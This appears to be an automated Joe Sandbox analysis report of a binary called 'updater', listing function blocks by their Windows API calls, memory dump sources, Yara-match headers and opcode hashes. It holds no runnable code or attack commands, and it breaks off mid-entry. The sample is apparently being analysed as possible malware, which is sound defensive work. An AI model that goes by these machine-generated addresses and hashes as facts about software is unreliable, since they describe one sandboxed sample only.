                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _strlen.LIBCMT ref: 013C2B2C
                                    • _strlen.LIBCMT ref: 013C2B48
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave_strlen$ConditionVariableWake
                                    • String ID: ~\AJ[MZ`OCK.
                                    • API String ID: 2310394193-2575923559
                                    • Opcode ID: 5e0edc0aa3a522d9f7f1522db0787e3c99f4e7dd2d30cec7308ec493f6dc2274
                                    • Instruction ID: 6a9b2e50e596886c1f5ae4e977f92a4abea00a24f8ee12c8613cd9d3c8411fb1
                                    • Opcode Fuzzy Hash: 5e0edc0aa3a522d9f7f1522db0787e3c99f4e7dd2d30cec7308ec493f6dc2274
                                    • Instruction Fuzzy Hash: DE411531D14686CEEF15EFADC4447AEBBB0AF66B18F14005ED0016B1A2DBB45D46CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 014217B1: GetConsoleCP.KERNEL32 ref: 014217F9
                                    • WriteFile.KERNEL32(?,00000001,00000000,014502C0,00000000), ref: 0142216D
                                    • GetLastError.KERNEL32(?,00000000,00000001), ref: 01422177
                                    • __dosmaperr.LIBCMT ref: 014221BC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                    • String ID:
                                    • API String ID: 251514795-0
                                    • Opcode ID: 7cc1758faf1061710d2fbeee1147eaa748aa02380eb915e662e80ae8ce56b9d4
                                    • Instruction ID: 60e99518b51a002023259802f598e86d1fc5917966d31e58b03f8aa9c612d659
                                    • Opcode Fuzzy Hash: 7cc1758faf1061710d2fbeee1147eaa748aa02380eb915e662e80ae8ce56b9d4
                                    • Instruction Fuzzy Hash: 8551F47590022AABEB11DFA9C844FFFBBB9BF19310F540017D600AB271D6B49982C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 01428806
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01428874
                                      • Part of subcall function 0142749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0142165F,?,00000000,00000000), ref: 0142753D
                                      • Part of subcall function 0142255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E
                                    • _free.LIBCMT ref: 01428865
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                    • String ID:
                                    • API String ID: 2560199156-0
                                    • Opcode ID: 3471f784f5daaed53e06eea1d72e8046525772e4bc016a351c914c071ac54050
                                    • Instruction ID: 2cf8ad3ce74f3d5777828c8d0adc31aeb4480e0d36ae5d7004bc8f7f362cfc6a
                                    • Opcode Fuzzy Hash: 3471f784f5daaed53e06eea1d72e8046525772e4bc016a351c914c071ac54050
                                    • Instruction Fuzzy Hash: F70188A29012337F3721557B2C88C7F6DADDEE1D91354052AF914D6224EAB1CD8181B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CloseHandle.KERNEL32(00000000), ref: 01421139
                                    • GetLastError.KERNEL32(?,01421011,?,01450260,0000000C,014210C3,?,?,?), ref: 01421143
                                    • __dosmaperr.LIBCMT ref: 0142116E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseErrorHandleLast__dosmaperr
                                    • String ID:
                                    • API String ID: 2583163307-0
                                    • Opcode ID: 875889e8aa3c4cbf5f48ed59cd8da03bdc79405cae3acc93b82c19543290e3e8
                                    • Instruction ID: ec5c1d48c5f6615f0aebfd2ec1507876519e123fba41e25589dddb5692dc6368
                                    • Opcode Fuzzy Hash: 875889e8aa3c4cbf5f48ed59cd8da03bdc79405cae3acc93b82c19543290e3e8
                                    • Instruction Fuzzy Hash: FB010C3270013016E635153ED84977FAB5A4BA6F38FB9055FE904873F2DF7484C54290
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 013D3173
                                    • GetLastError.KERNEL32 ref: 013D317E
                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 013D31A0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$ErrorLastPointerRead
                                    • String ID:
                                    • API String ID: 64821003-0
                                    • Opcode ID: 964edaa0d159b1a6a185ee8be68134cf19213602c4374372f147b080ce46abbb
                                    • Instruction ID: 7e97a7057c688601ff79fae6109c8d0fd080eca71b09ef7a145aa28680a5f6fb
                                    • Opcode Fuzzy Hash: 964edaa0d159b1a6a185ee8be68134cf19213602c4374372f147b080ce46abbb
                                    • Instruction Fuzzy Hash: B8018CB330020AFBDB219EA9EC45F9B7BBCFB053A4F104621F915DA290D270DD4087A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileMappingA.KERNEL32 ref: 013B777E
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,05F5E100), ref: 013B779B
                                    • CloseHandle.KERNEL32(?), ref: 013B77AB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleMappingView
                                    • String ID:
                                    • API String ID: 1187395538-0
                                    • Opcode ID: 971f638c18207bfcb2c7fdc73aa4d1db1446aab994fda5cc7798828f235f8ec9
                                    • Instruction ID: 1d3c423bdfc5874601d5a679006a452b2a373be29bf9b8246c324ccda7d2a943
                                    • Opcode Fuzzy Hash: 971f638c18207bfcb2c7fdc73aa4d1db1446aab994fda5cc7798828f235f8ec9
                                    • Instruction Fuzzy Hash: 21111674900B40DED7328A2A9885FB3BBF8EBD9769B20855EE69681DD1F2709440CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,?,00815C28,?,013B84B6), ref: 013B795E
                                    • CloseHandle.KERNEL32(00000000), ref: 013B7971
                                    • CloseHandle.KERNEL32(00000000), ref: 013B798A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$FileUnmapView
                                    • String ID:
                                    • API String ID: 260491571-0
                                    • Opcode ID: 3e9e87dc77ec28d5f6694b7265c11d0f5888a570dbff0372cd43bcb7d71dca04
                                    • Instruction ID: 64b4526b695d673ddbcb733edf224812d05c3ecd0b102cb1d2422c4f0a4153b7
                                    • Opcode Fuzzy Hash: 3e9e87dc77ec28d5f6694b7265c11d0f5888a570dbff0372cd43bcb7d71dca04
                                    • Instruction Fuzzy Hash: C2011971004B408FF7329B79C48C7A2BBE0AB4432AF04C96DD2DA459A0E3B9A488CF04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • EnterCriticalSection.KERNEL32(00000004,00000004,00000000,013B4737,?,?,?,?,?,013B46CC), ref: 013B46A1
                                    • GdiplusShutdown.GDIPLUS(00000000,?,?,?,?,?,013B46CC), ref: 013B46AE
                                    • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013B46CC), ref: 013B46B8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterGdiplusLeaveShutdown
                                    • String ID:
                                    • API String ID: 3929762956-0
                                    • Opcode ID: d102b7521eb5a7ff5a2f0dd90d11b4695263f47f1ff637c5d77aba955f34e17d
                                    • Instruction ID: ecb3eea18559f2bdd119fea394e12fe3b53ef75b31c04fc6176a1cfab9535821
                                    • Opcode Fuzzy Hash: d102b7521eb5a7ff5a2f0dd90d11b4695263f47f1ff637c5d77aba955f34e17d
                                    • Instruction Fuzzy Hash: ECD09EBA000110DBD7321F18F8497EAB7F9EB85727F11491DF5D291068D7B41886DB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 01428201
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Info
                                    • String ID:
                                    • API String ID: 1807457897-3916222277
                                    • Opcode ID: f910cad912491b27c9395598880c7f9872ca77a1d0d1ea6282a825b5223466ae
                                    • Instruction ID: bc06350a0a5a3a9d05cf7bb676ebb8b7a78a7c6c016708835e16a94d2c3121b3
                                    • Opcode Fuzzy Hash: f910cad912491b27c9395598880c7f9872ca77a1d0d1ea6282a825b5223466ae
                                    • Instruction Fuzzy Hash: 8141AE705042699BDB218F18CD84BFF7BFDAB16304F9804AED5CA87162D27199C5CB30
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0141FEA7
                                    Strings
                                    • InitializeCriticalSectionEx, xrefs: 0141FE77
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountCriticalInitializeSectionSpin
                                    • String ID: InitializeCriticalSectionEx
                                    • API String ID: 2593887523-3084827643
                                    • Opcode ID: 2e73839bcde26f73ea1be5dc8a3a81e5d773cbe39b8e37b992ad94c9e10d294f
                                    • Instruction ID: d038bc4d6c995496d15397509afe7569c6ff8284dace20079c9101f9c740502d
                                    • Opcode Fuzzy Hash: 2e73839bcde26f73ea1be5dc8a3a81e5d773cbe39b8e37b992ad94c9e10d294f
                                    • Instruction Fuzzy Hash: F6E09232580228BBCF212F92DC05D9E7F16DB64BB1B004016FD0815134C7B68927ABC0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Alloc
                                    • String ID: FlsAlloc
                                    • API String ID: 2773662609-671089009
                                    • Opcode ID: 0a1095d68f20b1a096c7d7b7532e6af5efbe4b77d5b670999688262684f8b497
                                    • Instruction ID: 85479378741f723dc8471464f8c13fb3a8cdac4bbdff1f0f9fe61ed95de69e72
                                    • Opcode Fuzzy Hash: 0a1095d68f20b1a096c7d7b7532e6af5efbe4b77d5b670999688262684f8b497
                                    • Instruction Fuzzy Hash: 2FE02B72AC022473C3213692EC0AD5EBD4BDFA8BB2F154017FD085223CDAB5091756D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 014280F9: GetOEMCP.KERNEL32(00000000,0142836B,?,?,01413E8D,01413E8D,?), ref: 01428124
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,014283B2,?,00000000,?,?,?,?,?,?,01413E8D), ref: 014285C2
                                    • GetCPInfo.KERNEL32(00000000,014283B2,?,?,014283B2,?,00000000,?,?,?,?,?,?,01413E8D,?), ref: 01428604
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID:
                                    • API String ID: 546120528-0
                                    • Opcode ID: a0e45c004e3f41683436aa8dcd84faccbf068fe93315463ce12671dc949fa0b7
                                    • Instruction ID: 1c23baa313c4f083bfe3905f3729fe1118017d09523504ffdd5edf522bf6c283
                                    • Opcode Fuzzy Hash: a0e45c004e3f41683436aa8dcd84faccbf068fe93315463ce12671dc949fa0b7
                                    • Instruction Fuzzy Hash: 145114709002679EDB318F6AC844ABFBBE5EF61204F98452FD18A87272D77595C6CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 014280F9: GetOEMCP.KERNEL32(00000000,0142836B,?,?,01413E8D,01413E8D,?), ref: 01428124
                                    • _free.LIBCMT ref: 014283C8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: b23e38ce20d40e11b5ac2fbf25d4d2d8959d1146f1dea0eb4a6ed694448b28f1
                                    • Instruction ID: d7b2afbfdd2d167d758c46186d19be6d508f108271d8e70273a157153f396995
                                    • Opcode Fuzzy Hash: b23e38ce20d40e11b5ac2fbf25d4d2d8959d1146f1dea0eb4a6ed694448b28f1
                                    • Instruction Fuzzy Hash: 2031AF7290026AAFDB02DF6DD840AAF7BF4EF54324F51406BE910972B1EB72D990CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013D2F5C: GetVersionExA.KERNEL32(?), ref: 013D2F80
                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013D366D
                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013D3675
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile$Version
                                    • String ID:
                                    • API String ID: 1715692615-0
                                    • Opcode ID: cb64873c1e395570a702aca99a4043fa04038b050c035fceef19f363cdda5b5d
                                    • Instruction ID: 5894ef08bbd3647ba9a7fafa2fcbe69b3ea8aa4276abb2e8a08cb6e7161da050
                                    • Opcode Fuzzy Hash: cb64873c1e395570a702aca99a4043fa04038b050c035fceef19f363cdda5b5d
                                    • Instruction Fuzzy Hash: BA21B4B3A00206ABEB119F7CEC41B9E7BB5BF44668F144529E565EB2D0DB748C408B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 013B2C5F
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2C73
                                      • Part of subcall function 013F60E6: FindNextFileW.KERNEL32(?,?,?,013B2C78,?,?,?,?,?,?,?,?,00000000), ref: 013F60EF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFindNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                    • String ID:
                                    • API String ID: 1204997319-0
                                    • Opcode ID: ff0e21d8fc0a73eb5c8f9dcf57842096bde73ae152feea2a97b27fc9eaa41519
                                    • Instruction ID: 755b9c1d5bb9fc755049048837b0ce2a9f44e6670df8e847c199b3ee91451b51
                                    • Opcode Fuzzy Hash: ff0e21d8fc0a73eb5c8f9dcf57842096bde73ae152feea2a97b27fc9eaa41519
                                    • Instruction Fuzzy Hash: 4E21367161020AAFDF15AFD8D9C0ADF77F4AF1831CF00461AEA02E7951E770E9408B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,00000000), ref: 013CBBCB
                                    • RegGetValueA.KERNEL32(?,00000000,?,00000002,00000000,00000000,00000100,?,?,00000000,00020019,?,?,?,00000000), ref: 013CBBF1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenValue
                                    • String ID:
                                    • API String ID: 3130442925-0
                                    • Opcode ID: 956fa6178da3cbb146ee5d18100387a533566c57c2b465d0c72e794edefccf3f
                                    • Instruction ID: 114749ab49367cf68c243037f700267d5e07a5cb29317689ec17b8102d770ac0
                                    • Opcode Fuzzy Hash: 956fa6178da3cbb146ee5d18100387a533566c57c2b465d0c72e794edefccf3f
                                    • Instruction Fuzzy Hash: 4B21607164030AAFEB24DF58DC91BEEB7B8EB98B48F10412EF502A6191D7F49D44CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013B79E0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 107a46bae4dc1d4eb999375325ee4bcd35cb79a88028c3a730045a30a5f87964
                                    • Instruction ID: 57eb6999889a78596279e36c52b2efe76d43b42230dabb140768162f9b66452b
                                    • Opcode Fuzzy Hash: 107a46bae4dc1d4eb999375325ee4bcd35cb79a88028c3a730045a30a5f87964
                                    • Instruction Fuzzy Hash: 030184B16047449EF3618A7C8884BB6BBECEB85214F10493EF796D3B91F770A9409710
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 013F6094
                                    • GetLastError.KERNEL32 ref: 013F60A7
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast
                                    • String ID:
                                    • API String ID: 1375471231-0
                                    • Opcode ID: 7ac2e1ad40a287c84e4dfc2d75d955cf2565b796416f1e9b885d42fe84ff9d1e
                                    • Instruction ID: 5762f3c99f1698355e90aff4a8159dc957295d6dc759dfd90dc14b1d897a59c8
                                    • Opcode Fuzzy Hash: 7ac2e1ad40a287c84e4dfc2d75d955cf2565b796416f1e9b885d42fe84ff9d1e
                                    • Instruction Fuzzy Hash: DCF0FC70B0411D6BDF114A5CCD41ADE7ABD9B5425CF208139EA00A2246DF71D8418390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
